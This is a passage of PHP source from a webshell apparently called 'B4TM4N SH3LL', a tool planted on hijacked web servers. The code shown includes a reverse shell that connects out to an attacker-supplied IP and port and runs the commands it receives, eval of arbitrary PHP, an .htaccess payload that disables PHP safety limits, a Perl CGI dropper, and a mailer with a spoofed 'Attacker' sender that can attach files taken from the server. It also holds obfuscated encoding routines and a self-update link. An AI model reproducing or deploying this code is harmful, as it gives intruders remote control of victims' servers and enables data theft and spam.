\t\t\t\t\t\t\t<legend>Status</legend>\r\n\t\t\t\t\t\t\t<div id='connect-result'>Terminal: %s", remote_addr, Execute('whoami'));
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "reverse-connect") {
if ($_REQUEST['socket'] == "fsockopen") {
$host = $_REQUEST['reverse-ip'];
$port = $_REQUEST['reverse-port'];
$sock = @fsockopen($host, $port, $errno, $errstr);
if ($errno != 0) {
printf("<font color='red'><b>%s</b>:%s</font>", $errno, $errstr);
} else {
while (!feof($sock)) {
fwrite($sock, "[b4tm4n]:");
$command = fgets($sock, 1024);
if (trim($command) == 'quit' || trim($command) == 'exit') {
fclose($sock);
printf($command);
exit;
}
fwrite($sock, Execute($command));
}
fclose($sock);
}
} else {
if ($_REQUEST['socket'] == "socket_create") {
$host = $_REQUEST['reverse-ip'];
$port = $_REQUEST['reverse-port'];
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_nonblock($sock);
if (!$sock) {
printf("<font color='red'>Connection Error</font>");
} else {
while (!@socket_connect($sock, $host, $port)) {
@socket_write($sock, "[b4tm4n]:", strlen("[b4tm4n]:"));
$input = @socket_read($sock, 1024, PHP_NORMAL_READ);
if (trim($input) == 'quit' || trim($input) == 'exit') {
socket_set_block($sock);
socket_close($sock);
printf($input);
exit;
}
@socket_write($sock, Execute($input), strlen(Execute($input)));
}
socket_set_block($sock);
socket_close($sock);
}
} else {
if ($_REQUEST['socket'] == "stream_socket_client") {
$host = $_REQUEST['reverse-ip'];
$port = $_REQUEST['reverse-port'];
$sock = @stream_socket_client("tcp://{$host}:{$port}", $errno, $errstr);
if (!$sock) {
printf("<font color='red'><b>%s</b>:%s</font>", $errno, $errstr);
} else {
while (!feof($sock)) {
fwrite($sock, "[b4tm4n]:");
$command = fgets($sock, 1024);
if (trim($command) == 'quit' || trim($command) == 'exit') {
fclose($sock);
printf($command);
exit;
}
fwrite($sock, Execute($command));
}
fclose($sock);
}
}
}
}
}
printf("</fieldset></div></div></div></div>");
}
if ($_REQUEST['x'] == "htaccess") {
$php_ini = array("php_value upload_max_filesize 32M", "php_value post_max_size 32M", "php_flag safe_mode Off", "php_value disable_functions null", "php_flag safe_mode_gid Off", "php_value open_basedir {$dir}", "php_flag register_globals On", "php_flag exec On", "php_flag shell_exec On");
$htaccess = array("Options All", "Allow From All", "Satisfy Any");
printf("\r\n\t\t\t<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t</div>\r\n\t\t\t</div>", implode($php_ini, "\n"), "Options All\nAllow From All\nSatisfy Any");
}
if ($_REQUEST['x'] == "php") {
$exp = array("print_r(get_extension_funcs('Core'));", "print_r(get_loaded_extensions());", "print_r(ini_get_all('pcre'));", "print_r(ini_get_all());", "print_r(get_defined_constants());", "print_r(get_defined_functions());", "print_r(get_declared_classes());");
printf("<div id='php'>\r\n\t\t\t\t\t<form onsubmit='return false;'>\r\n\t\t\t\t\t\t<div class='php-left'>\r\n\t\t\t\t\t\t\t<textarea id='php-code' cols='122' rows='20'>%s</textarea>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='php-right'>\r\n\t\t\t\t\t\t\t<textarea id='php-eval' cols='122' rows='20' readonly></textarea>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&codex='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Inject'/>\r\n\t\t\t\t\t\t<input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&code='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Run'/>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>", "print_r(get_extension_funcs('Core'));\nprint_r(get_loaded_extensions());\nprint_r(ini_get_all('pcre'));\nprint_r(ini_get_all());\nprint_r(get_defined_constants());\nprint_r(get_defined_functions());\nprint_r(get_declared_classes());");
if (any("code", $_REQUEST)) {
ob_clean();
$code = trim($_REQUEST['code']);
$evil = Evil($code);
exit;
}
if (any("codex", $_REQUEST)) {
ob_clean();
$code = trim($_REQUEST['codex']);
$evil = Evil($code, true);
exit;
}
}
if ($_REQUEST['x'] == "perl") {
print 'PHP Perl Class: ' . (class_exists('Perl') ? "<b class='on'>ON</b>" : "<b class='off'>OFF</b>") . '<br>';
if (Unix()) {
if (file_exists("/usr/bin/perl")) {
$path_perl = "/usr/bin/perl";
} else {
$path_perl = "/usr/bin/env perl";
}
} else {
if (file_exists("C:\\perl\\bin\\perl.exe")) {
$path_perl = "C:\\perl\\bin\\perl.exe";
} elseif (file_exists("C:\\wamp\\bin\\perl.exe")) {
$path_perl = "C:\\wamp\\bin\\perl.exe";
} elseif (file_exists("C:\\xampp\\perl\\bin\\perl.exe")) {
$path_perl = "C:\\xampp\\perl\\bin\\perl.exe";
}
}
$script = array("#!{$path_perl}", "use strict;", "use warnings;", "use CGI;", "print CGI::header();", "print 'k4mpr3t on CGI';");
$htaccess = array("Options +ExecCGI +SymLinksIfOwnerMatch", "DirectoryIndex index.ler", "AddType application/x-httpd-cgi .ler", "AddHandler cgi-script .ler");
$path = $dir . _ . 'cgi-bin';
$file = $path . _ . 'perl.ler';
$file2 = $path . _ . '.htaccess';
$scripts = implode($script, "\n");
$htaccesss = "Options +ExecCGI +SymLinksIfOwnerMatch\nDirectoryIndex index.ler\nAddType application/x-httpd-cgi .ler\nAddHandler cgi-script .ler";
if (!is_dir($path)) {
mkdir($path, 0755);
}
if (!is_file($file)) {
$op = fopen($file, 'w+');
fwrite($op, $scripts);
fclose($op);
chmod($file, 0755);
}
if (!is_file($file2)) {
$op = fopen($file2, 'w+');
fwrite($op, $htaccesss);
fclose($op);
chmod($file2, 0755);
}
$redirect = GetUrlFromPath($file);
printf("Tested -> <a href='{$redirect}' target='_blank'><u>Link</u></a>");
if (class_exists('Perl')) {
//$perl=Perl::getInstance();
$perl = new Perl();
$perl->eval("print \"Executing Perl code in PHP\n\"");
print "Hello from PHP! ";
//$perl=new Perl();
$perl->require($file);
$val = $perl->somePhpFunc('test');
print $val;
}
}
if ($_REQUEST['x'] == "mail") {
printf("\r\n\r\n\t\t\t<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t<legend>Mail</legend>\r\n\t\t\t\t\t\t<form onsubmit='return false;' class='mail'>\r\n\t\t\t\t\t\t\t<label>From</label><input type='text' id='email-from' placeholder='Attacker <very@handsome.com>' value='Attacker <very@handsome.com>'/><br>\r\n\t\t\t\t\t\t\t<label>Reply To</label><input type='text' id='email-reply' placeholder=very@handsome.com' value='very@handsome.com'/><br>\r\n\t\t\t\t\t\t\t<label>To</label><input type='text' id='email-to' placeholder='Target 1 <target1@target.com>,Target 2 <target2@target.com>' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Cc</label><input type='text' id='email-cc' placeholder='target1@target.com,target2@target.com' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Bcc</label><input type='text' id='email-bcc' placeholder='target1@target.com,target2@target.com' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Subject</label><input type='text' id='email-subject' placeholder='What You Waiting For ?' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Attachment (FIlename)</label><input type='text' id='email-attachment' placeholder='%s' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Messages</label><input type='text' id='email-message'/><br>\r\n\t\t\t\t\t\t\t<input type='submit' value='Send' onclick=\"\r\n\r\n\t\t\t\t\t\t\t\tgetAjax(true,\r\n\t\t\t\t\t\t\t\t\t'send-result',\r\n\t\t\t\t\t\t\t\t\t'POST',\r\n\t\t\t\t\t\t\t\t\t'?x=mail&xa=send'+\r\n\t\t\t\t\t\t\t\t\t'&from='+document.getElementById('email-from').value+\r\n\t\t\t\t\t\t\t\t\t'&reply='+document.getElementById('email-reply').value+\r\n\t\t\t\t\t\t\t\t\t'&to='+document.getElementById('email-to').value+\r\n\t\t\t\t\t\t\t\t\t'&cc='+document.getElementById('email-cc').value+\r\n\t\t\t\t\t\t\t\t\t'&bcc='+document.getElementById('email-bcc').value+\r\n\t\t\t\t\t\t\t\t\t'&subject='+document.getElementById('email-subject').value+\r\n\t\t\t\t\t\t\t\t\t'&message='+document.getElementById('email-message').value+\r\n\t\t\t\t\t\t\t\t\t'&attachment='+document.getElementById('email-attachment').value);\r\n\r\n\t\t\t\t\t\t\t\"/>\t\r\n\t\t\t\t\t\t</form>\r\n\t\t\t\t\t</fieldset>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t<legend>Result's</legend>\r\n\t\t\t\t\t\t<div id='send-result'></div>\r\n\t\t\t\t\t</fieldset>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\r\n\r\n\t\t", php_self);
if (any('xa', $_REQUEST) && $_REQUEST['xa'] == 'send') {
ob_clean();
$from = $_REQUEST['from'];
$reply = $_REQUEST['reply'];
$to = $_REQUEST['to'];
$cc = $_REQUEST['cc'];
$bcc = $_REQUEST['bcc'];
$subject = $_REQUEST['subject'];
$msg = $_REQUEST['message'];
$attachment = $_REQUEST['attachment'];
$uid = md5(uniqid(time()));
$headers[] = "From: {$from}";
$headers[] = "Reply-To: {$reply}";
$headers[] = "To: {$to}";
if (!empty($cc)) {
$headers[] = 'Cc: $cc';
}
if (!empty($bcc)) {
$headers[] = 'Bcc: $bcc';
}
$headers[] = "MIME-Version: 1.0";
$headers[] = "Content-Type: multipart/mixed; boundary=\"{$uid}\"";
$messages[] = "--{$uid}";
$messages[] = "Content-type: text/html; charset=\"iso-8859-1\"";
$messages[] = "Content-Transfer-Encoding: 8bit";
$messages[] = "";
$messages[] = "{$msg}";
$messages[] = "";
if (is_file($attachment)) {
$content = file_get_contents($attachment);
$content = chunk_split(B64E($content));
$name = basename($attachment);
$mime = mime_content_type($attachment);
$messages[] = "--{$uid}";
$messages[] = "Content-Type: {$mime}; name=\"{$name}\"";
$messages[] = "Content-Transfer-Encoding: base64";
$messages[] = "Content-Disposition: attachment";
$messages[] = "";
$messages[] = "{$content}";
$messages[] = "";
$messages[] = "--{$uid}--";
}
$message = implode("\r\n", $messages);
$header = implode("\r\n", $headers);
if (mail($to, $subject, $message, $header)) {
print "Email Send";
} else {
$error = error_get_last();
print "Error :" . $error['message'];
}
exit;
}
}
if ($_REQUEST['x'] == 'process') {
printf("<div id='process-kill'><form class='new' method='post' action='?x=process&xa=kill'>\r\n\t\t\t\t\t<label>PID</label> <input type='text' name='pid'/>\r\n\t\t\t\t\t<input type='submit' value='Kill'/><br>\r\n\t\t\t\t\t<label>Name</label> <input type='text' name='name'/>\r\n\t\t\t\t\t<input type='submit' value='Kill'/>\r\n\t\t\t\t</form></div>");
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "kill") {
$pid = $_REQUEST['pid'];
$name = $_REQUEST['name'];
if (Unix()) {
$kill = Execute("kill 9 {$pid}");
$kill = Execute("kill 9 {$name}");
if ($kill) {
print "<font class=\"off\">Process Killed</font>";
}
} else {
$kill = Execute("taskkill /f /pid {$pid}");
$kill = Execute("taskkill /f /im {$name}");
if ($kill) {
print "<font class=\"off\">Process Killed</font>";
}
}
}
if (Unix()) {
$ret = iconv('UTF-8', 'UTF-8', Execute('ps aux'));
print '<div id="process-list"><pre>' . $ret . '</pre></div>';
} else {
$ret = iconv('Windows-1251', 'UTF-8', Execute('tasklist'));
print '<div id="process-list"><pre>' . $ret . '</pre></div>';
}
}
if ($_REQUEST['x'] == 'shells') {
print "Coming Soon";
}
if ($_REQUEST['x'] == 'symlink') {
print "Coming Soon";
}
if ($_REQUEST['x'] == "account") {
printf("<div id='account'><form class='new' method='post' action='?x=account&xa=change'>\r\n\t\t\t\t\t<label>Username</label> <input type='text' name='change-username' autocomplete='off' value='%s'/> <br>\r\n\t\t\t\t\t<label>Password</label> <input type='text' name='change-password' autocomplete='off'value=''/><br>\r\n\t\t\t\t\t<input type='submit' value='Change' onclick=\"return confirm('Sure ?');\"/>\r\n\t\t\t\t</form></div>", B64D($account[0]));
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "change") {
$filename = script_filename;
$username = $_REQUEST['change-password'];
$password = $_REQUEST['change-username'];
if (!empty($username) && !empty($password)) {
$user_from = $account[0];
$user_to = B64E($password);
$content = file_get_contents($filename);
$chunk = explode($user_from, $content);
$content = implode($user_to, $chunk);
$change = file_put_contents($filename, $content);
$pass_from = $account[1];
$pass_to = sha1(md5($username));
$content = file_get_contents($filename);
$chunk = explode($pass_from, $content);
$content = implode($pass_to, $chunk);
$change = file_put_contents($filename, $content);
if ($change) {
session_destroy();
session_regenerate_id();
header("location:php_self");
} else {
printf("Error change account");
}
} else {
printf("<b class='off'>Mistakes !</b>");
}
}
}
if ($_REQUEST['x'] == "action") {
$files = any('chk', $_REQUEST) ? $_REQUEST['chk'] : array();
$value = any('action-value', $_REQUEST) ? $_REQUEST['action-value'] : $_REQUEST['action-option'];
$tmp = "";
$row = "";
$count_dirs = 0;
$count_files = 0;
foreach ($files as $file) {
if (is_dir(urld($file))) {
$count_dirs++;
}
if (is_file(urld($file))) {
$count_files++;
}
$row .= "<tr><td>" . urld($file) . "</td></tr>";
$tmp .= urld($file) . ",";
}
if (count($files) == 1 && $value == 'copy') {
header("location:php_self?a=cp&r=" . $files[0]);
}
if (count($files) == 1 && $value == 'move') {
header("location:php_self?a=mv&r=" . $files[0]);
}
if (!any('xa', $_REQUEST) && $value == 'delete') {
printf("<h4>Dir's: [%s] File's: [%s]</h4>\r\n\t\t\t\t\t<table class='table'>%s</table>\r\n\t\t\t\t\t<form class='new' method='post' action='?x=action&xa=option'>\r\n\t\t\t\t\t\t<input type='hidden' name='action-option' value='%s'/>\r\n\t\t\t\t\t\t<input type='hidden' name='tmp' value='%s'/>\r\n\t\t\t\t\t\t<input type='submit' value='Remove'/>\r\n\t\t\t\t\t</form>", $count_dirs, $count_files, $row, $value, $tmp);
}
if (!any('xa', $_REQUEST) && $value != 'delete') {
printf("<h4>Dir's: [%s] File's: [%s]</h4>\r\n\t\t\t\t\t<table class='table'>%s</table>\r\n\t\t\t\t\t<form class='new' method='post' action='?x=action&xa=option'>\r\n\t\t\t\t\t\t<script>window.onload=function(e){document.getElementById('action_option').value='%s'}</script>\r\n\t\t\t\t\t\t<select name='action-option' id='action_option'>\r\n\t\t\t\t\t\t\t<option value='copy'>Copy</option>\r\n\t\t\t\t\t\t\t<option value='move'>Move</option>\r\n\t\t\t\t\t\t\t<option value='zip'>Archive (zip)</option>\r\n\t\t\t\t\t\t\t<option value='unzip'>Extract to (zip)</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t\t<i>-></i>\r\n\t\t\t\t\t\t<input type='hidden' name='tmp' value='%s'/>\r\n\t\t\t\t\t\t<input type='text' name='newloc' value='%s'/>\r\n\t\t\t\t\t\t<input type='submit' value='Process'/>\r\n\t\t\t\t\t</form>", $count_dirs, $count_files, $row, $value, $tmp, $dir . _);
}
if (any('xa', $_REQUEST) && $_REQUEST['xa'] == 'option') {
$files = array_filter(explode(',', $_REQUEST['tmp']));
$newloc = trim(@$_REQUEST['newloc']);
$succ = 0;
$fail = 0;
if ($_REQUEST['action-option'] == 'copy') {
if (file_exists($newloc) && is_dir($newloc)) {
foreach ($files as $file) {
if (CopyRecursive($file, rtrim($newloc, _) . _ . basename($file))) {
$succ++;
} else {
$fail++;
}
}
print "Success: {$succ} | Failed: {$fail}";
} else {
print "Target not exists !";
}
}
if ($_REQUEST['action-option'] == 'move') {
if (file_exists($newloc) && is_dir($newloc)) {
foreach ($files as $file) {
if (MoveRecursive($file, rtrim($newloc, _) . _ . basename($file))) {
$succ++;
} else {
$fail++;
}
}
print "Success: {$succ} | Failed: {$fail}";
} else {
print "Target not exists !";
}
}
if ($_REQUEST['action-option'] == 'delete') {
foreach ($files as $file) {
if (Remove($file)) {
$succ++;
} else {
$fail++;
}
}
print "Success: {$succ} | Failed: {$fail}";
}
if ($_REQUEST['action-option'] == 'zip') {
if (pathinfo($newloc)['extension'] == 'zip') {
$zip = new ZipArchive();
if ($zip->open($newloc, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) {
foreach ($files as $file) {
if (is_dir($file)) {
$zip->addEmptyDir(basename($file));
$recur = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($file), RecursiveIteratorIterator::LEAVES_ONLY);
foreach ($recur as $key => $val) {
if (basename($key) != "..") {
if (is_dir($key)) {
$zdir = str_replace($file, basename($file), realpath($key));
$zip->addEmptyDir($zdir);
} elseif (is_file($key)) {
$zfile = str_replace($file, basename($file), realpath($key));
$zip->addFile(realpath($key), $zfile);
}
}
}
} elseif (is_file($file)) {
$zip->addFile($file, basename($file));
}
}
$zip->close();
print "Zip Created";
} else {
print "Failed";
}
} else {
print "Extension must Zip";
}
}
if ($_REQUEST['action-option'] == 'unzip') {
if (file_exists($newloc) && is_dir($newloc)) {
foreach ($files as $file) {
if (pathinfo($newloc)['extension'] == 'zip') {
$zip = new ZipArchive();
if ($zip->open($file) === TRUE) {
$zip->extractTo($newloc);
$zip->close();
$succ++;
} else {
$fail++;
}
} else {
$fail++;
}
}
print "Success: {$succ} | Failed: {$fail}";
} else {
print "Target not exists !";
}
}
}
}
if ($_REQUEST['x'] == "find") {
$recur = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir), RecursiveIteratorIterator::LEAVES_ONLY);
if (any('find-value', $_REQUEST) && !empty($_REQUEST['find-value'])) {
$result = "";
$res_ = 0;
foreach ($recur as $key => $val) {
if (basename($key) != "..") {
if (strpos(realpath($key), $_REQUEST['find-value']) !== false) {
$result .= sprintf("<tr>\r\n\t\t\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t\t\t<td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>\r\n\t\t\t\t\t\t\t\t<td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>\r\n\t\t\t\t\t\t\t\t<td><center>%s</center></td>\r\n\t\t\t\t\t\t\t\t</tr>", substr(realpath($key), 0, strrpos(realpath($key), _)), substr(realpath($key), 0, strrpos(realpath($key), _)), substr(realpath($key), 0, strrpos(realpath($key), _)), realpath($key), realpath($key), basename(realpath($key)), GetFileTime(realpath($key), 'modify'));
$res_++;
}
}
}
printf("\r\n\t\t\t\t\t<form class='new' method=POST action='?x=find'>\r\n\t\t\t\t\t\t<input type='text' name='find-value' id='find-action' value='%s'/><input type='submit' name='find-button' value='Find'/>\r\n\t\t\t\t\t\t<label style='margin-left:10px'><font class='on'>Find: '%s' | Found's: %s</font></label>\t\r\n\t\t\t\t\t</form>\r\n\t\t\t\t\t<div class='auto-number'>\r\n\t\t\t\t\t\t<table class='table sortable'>\r\n\t\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t<th class='sorttable_nosort' width='15'>No.</th>\r\n\t\t\t\t\t\t\t\t\t<th>Directory</th>\r\n\t\t\t\t\t\t\t\t\t<th>Name</th>\r\n\t\t\t\t\t\t\t\t\t<th>Modified</th>\r\n\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t</table>\r\n\t\t\t\t\t</div>", $_REQUEST['find-value'], $_REQUEST['find-value'], $res_, $result);
} else {
print "<form class='new' method=POST action='?x=find'>\r\n\t\t\t\t\t\t<input type='text' name='find-value'/><input type='submit' name='find-button' value='Find'/>\r\n\t\t\t\t\t\t<label style='margin-left:10px'><font color='red'>Whoops, Nothing to Found's !</font></label>\r\n\t\t\t\t\t</form>";
}
}
if ($_REQUEST['x'] == "update") {
$link_update = 'https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';
$current_version = 2.7;
//New Version Released
if ($config['debug'] == true) {
$latest_version = 2.8000000000000003;
//Test Update latest version -/+ 0.1
} else {
$git_script = GetUrlContent($link_update);
$get_version = strpos($git_script, "current_version");
$version = substr($git_script, $get_version + 16, 3);
$latest_version = is_numeric($version) ? $version : $current_version;
}
$status = "";
if ((float) $latest_version > (float) $current_version) {
if ($config['debug'] == true) {
$status .= 'New Version Available ' . $latest_version . '<br>Setting Debug to False for Activate this Feature';
} else {
$status .= 'New Version Available ' . $latest_version . '<br>Download -> [<font class="on"><a href="' . $link_update . '" target="_blank">link</a></font>]';
}
} else {
$status .= 'Latest Version ' . $current_version;
}
Printf("<div id='update'>\r\n\t\t\t\t\t<a href='https://www.gnu.org/licenses/gpl-3.0.txt' target='_blank' title='License'>\r\n\t\t\t\t\t\t<img src='https://www.gnu.org/graphics/lgplv3-88x31.png'/>\r\n\t\t\t\t\t</a><br><br>%s\r\n\t\t\t\t</div>", $status);
}
if ($_REQUEST['x'] == "self-encryptor") {
if ($php_script = htmlentities(@"<?php\r\n\r\n/* \r\n * B4TM4N SH3LL is PHP WEBSHELL\r\n *\r\n * Features:\r\n *\t\t[0] File Manager\r\n *\t\t[1] Sec. Info\r\n *\t\t[2] Simply Database\r\n *\t\t[3] Interactive terminal\r\n *\t\t[4] PHP Reverse Back Connect\r\n *\t\t[5] Run PHP Code\r\n *\t\t[6] Custom Toolz\r\n *\t\t[7] Self Script Encryptor !\r\n *\t\t[8] Error Handler\r\n *\t\t[9] Themes\r\n *\r\n * Account:\r\n *\t\t[Username] B64E('user')\r\n *\t\t[Password] sha1(md5('pass'))\r\n */\r\n\r\n\$x_=\"zaIgxSRawZ==:42b378d7eb719b4ad9c908601bdf290d541c9c3a\";\r\n\r\n/*\r\n * Self Script Encryptor v1.0\r\n * ------- by k4mpr3t -------\r\n *\r\n * [Usage] http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php\r\n *\r\n */\r\n\r\n\$config=array(\r\n\t\"title\" => \"B4TM4N SH3LL\", // Your Title\r\n\t\"subtitle\" => \"V3RS10N 2.7 ~ k4mpr3t\", // Your Subtitle\r\n\t\"themes\" => \"br34k\", // Your Themes (D4RK or BR34K)\r\n\t\"debug\" => false // Debug Mode\r\n);\r\n\r\n\$account=explode(':',\$x_);\r\n\r\nsession_start(); // Session Start\r\n\r\nfunction any(\$x,\$y)\r\n{\r\n\treturn array_key_exists(\$x,\$y);\r\n}\r\n\r\nfunction urle(\$x)\r\n{\r\n\treturn B64E(urlencode(\$x));\r\n}\r\n\r\nfunction urld(\$x)\r\n{\r\n\treturn urldecode(B64D(urldecode(\$x)));\r\n}\r\n\r\ndefine('_',DIRECTORY_SEPARATOR);\r\n\r\nforeach(\$_SERVER as \$k => \$v)\r\n{\r\n\tdefine(strtolower(\$k),\$_SERVER[\$k]);\r\n}\r\n\r\nfunction B64E(\$x)\r\n{\r\n\t\$d=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";\r\n\t\$c=\"ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/\";\r\n\t\$_a=\"b\";\$_b=\"a\";\$_c=\"s\";\$_d=\"e\";\$_e=\"6\";\$_f=\"4\";\r\n\t\$_g=\"_\";\$_h=\"e\";\$_i=\"n\";\$_j=\"c\";\$_k=\"o\";\$_l=\"d\";\$_m=\"e\";\r\n\t\$b64=\$_a.\$_b.\$_c.\$_d.\$_e.\$_f.\$_g.\$_h.\$_i.\$_j.\$_k.\$_l.\$_m;\r\n\treturn strtr(\$b64(\$x),\$d,\$c);\r\n}\r\n\r\nfunction B64D(\$x)\r\n{\r\n\t\$d=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";\r\n\t\$c=\"ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/\";\r\n\t\$_a=\"b\";\$_b=\"a\";\$_c=\"s\";\$_d=\"e\";\$_e=\"6\";\$_f=\"4\";\r\n\t\$_g=\"_\";\$_h=\"d\";\$_i=\"e\";\$_j=\"c\";\$_k=\"o\";\$_l=\"d\";\$_m=\"e\";\r\n\t\$b64=\$_a.\$_b.\$_c.\$_d.\$_e.\$_f.\$_g.\$_h.\$_i.\$_j.\$_k.\$_l.\$_m;\r\n\treturn \$b64(strtr(\$x,\$d,\$c));\r\n}\r\n\r\nfunction error (\$errno, \$errstr, \$errfile, \$errline)\r\n{\r\n\tswitch (\$errno)\r\n\t{\r\n\t\tcase E_PARSE:\r\n\t\tcase E_STRICT:\$errmsg='# DEBUG';break;\r\n\t\tcase E_NOTICE:\r\n\t\tcase E_USER_NOTICE:\$errmsg='# NOTICE';break;\r\n\t\tcase E_USER_ERROR:\r\n\t\tcase E_RECOVERABLE_ERROR:\$errmsg='# ERROR';break;\r\n\t\tcase E_WARNING:\r\n\t\tcase E_CORE_WARNING:\r\n\t\tcase E_COMPILE_WARNING:\r\n\t\tcase E_USER_WARNING:\$errmsg='# WARNING';break;\r\n\t\tcase E_ERROR:\r\n\t\tcase E_CORE_ERROR:\r\n\t\tcase E_COMPILE_ERROR:\$errmsg='# FATAL ERROR';break;\r\n\t\tdefault:\$errmsg='# UNKNOWN ERROR';break;\r\n\t}\r\n\techo '<div class=\"error\">';\r\n\techo \$errmsg;\r\n\techo \"<br>\";\r\n\techo \$errstr;\r\n\techo \"<br>\";\r\n\techo \$errfile . ' (Line: ' . \$errline . ')';\r\n\techo \"<br>\";\r\n\techo \"<br>\";\r\n\techo \"</div>\";\r\n}\r\n\r\n// Login Request\r\nif(request_method==\"POST\")\r\n{\r\n\tif(any(\"username\",\$_REQUEST)&&any(\"password\",\$_REQUEST)&&any(\"signin\",\$_REQUEST))\r\n\t{\r\n\t\tif((B64E(\$_REQUEST['username'])==\$account[0])&&(sha1(md5(\$_REQUEST['password']))==\$account[1]))\r\n\t\t{\r\n\t\t\tsession_regenerate_id();\r\n\t\t\t\$_SESSION['action']=array(\r\n\t\t\t\t\"username\" => B64E(\$_REQUEST['username']),\r\n\t\t\t\t\"password\" => sha1(md5(\$_REQUEST['password']))\r\n\t\t\t);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t// THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5)\r\n\t\t\t\$log=array(\r\n\t\t\t\t\"Username: \".\$_REQUEST['username'],\r\n\t\t\t\t\"Password: \".\$_REQUEST['password'],\r\n\t\t\t\t\"Remote IP: \".remote_addr,\r\n\t\t\t\t\"Time: \".date('Y-m-d H:i:s'),\r\n\t\t\t\t\"-------------------------\\r\\n\",\r\n\t\t\t);\r\n\t\t\t\$file=dirname(__FILE__)._.'.log';\r\n\t\t\t\$write_log=implode(\$log,\"\\r\\n\");\r\n\t\t\t\$op=fopen(\$file,'a+');\r\n\t\t\tfwrite(\$op,\$write_log);\r\n\t\t\tfclose(\$op);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nif(!any(\"action\",\$_SESSION))\r\n{\r\n?><!doctype html>\r\n<html lang=\"en\">\r\n<head>\r\n<meta charset=\"utf-8\">\r\n<meta name=\"robots\" content=\"noindex\"/>\r\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1,shrink-to-fit=no\">\r\n<title>Signin</title>\r\n<link href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css\" rel=\"stylesheet\" id=\"bootstrap-css\">\r\n<style type='text/css'>\r\n\thtml,body{\r\n\theight:100%;\r\n\t}\r\n\tbody{\r\n\tdisplay:-ms-flexbox;\r\n\tdisplay:-webkit-box;\r\n\tdisplay:flex;\r\n\t-ms-flex-align:center;\r\n\t-ms-flex-pack:center;\r\n\t-webkit-box-align:center;\r\n\talign-items:center;\r\n\t-webkit-box-pack:center;\r\n\tjustify-content:center;\r\n\tpadding-top:40px;\r\n\tpadding-bottom:40px;\r\n\tbackground-color:#f5f5f5;\r\n\t}\r\n\t.form-signin{\r\n\twidth:100%;\r\n\tmax-width:330px;\r\n\tpadding:15px;\r\n\tmargin:0 auto;\r\n\t}\r\n\t.form-signin.checkbox{\r\n\tfont-weight:400;\r\n\t}\r\n\t.form-signin.form-control{\r\n\tposition:relative;\r\n\tbox-sizing:border-box;\r\n\theight:auto;\r\n\tpadding:10px;\r\n\tfont-size:16px;\r\n\t}\r\n\t.form-signin.form-control:focus{\r\n\tz-index:2;\r\n\t}\r\n\t.form-signin input[type=\"email\"]{\r\n\tmargin-bottom:-1px;\r\n\tborder-bottom-right-radius:0;\r\n\tborder-bottom-left-radius:0;\r\n\t}\r\n\t.form-signin input[type=\"password\"]{\r\n\tmargin-bottom:10px;\r\n\tborder-top-left-radius:0;\r\n\tborder-top-right-radius:0;\r\n\t}\r\n</style>\r\n</head>\r\n<body class=\"text-center\">\r\n\t<form class=\"form-signin\" method='post'>\r\n\t\t<h1 class=\"h3 mb-3 font-weight-normal\">Please sign in</h1>\r\n\t\t<label for=\"username\" class=\"sr-only\">Email address</label>\r\n\t\t<input type=\"text\" name=\"username\" id=\"username\" class=\"form-control\" placeholder=\"Username\" autocomplete=\"off\" required autofocus>\r\n\t\t<label for=\"password\" class=\"sr-only\">Password</label>\r\n\t\t<input type=\"password\" name=\"password\" id=\"password\" class=\"form-control\" placeholder=\"Password\" autocomplete=\"off\" required>\r\n\t\t<button class=\"btn btn-lg btn-primary btn-block\" type=\"submit\" name=\"signin\" value=\"signin\">Sign In</button>\r\n\t\t<p class=\"mt-5 mb-3 